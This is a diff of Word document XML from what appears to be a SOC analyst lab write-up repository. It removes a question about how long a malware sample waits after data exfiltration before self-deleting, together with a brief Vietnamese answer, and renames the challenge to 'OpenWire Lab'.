-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Understanding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>behavior</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>post-data</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>exfiltration</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>give</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>insights</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>into</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>evasion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>techniques</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>By</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>analyzing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>child</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>processes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>after</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>successfully</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>exfiltrating</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>user's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>data</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>how</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>many</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>seconds</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>does</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>take</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>self-delete</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tự xóa thường liên quan đến các lệnh lên lịch để xóa các tệp của phần mềm độc hại và có thể được thực hiện sau một khoảng thời gian trì hoãn để đảm bảo các hoạt động độc hại, chẳng hạn như trích xuất dữ liệu hoặc gửi </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>, được hoàn tất đầy đủ.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="103EAB7C" wp14:editId="61107C48">
-            <wp:extent cx="5943600" cy="2740660"/>
-            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
-            <wp:docPr id="1548074436" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1548074436" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2740660"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>

--- a/SOC analyst lv 1/TEMP.docx
+++ b/SOC analyst lv 1/TEMP.docx
@@ -12,6 +12,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22,6 +23,7 @@
         </w:rPr>
         <w:t>Challenge</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -30,14 +32,34 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Reveal Lab</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>OpenWire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Lab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -47,6 +69,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -55,23 +78,70 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Platform:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>SOC Analyst Tier 1</w:t>
+        <w:t>Platform</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SOC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Analyst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -82,6 +152,7 @@
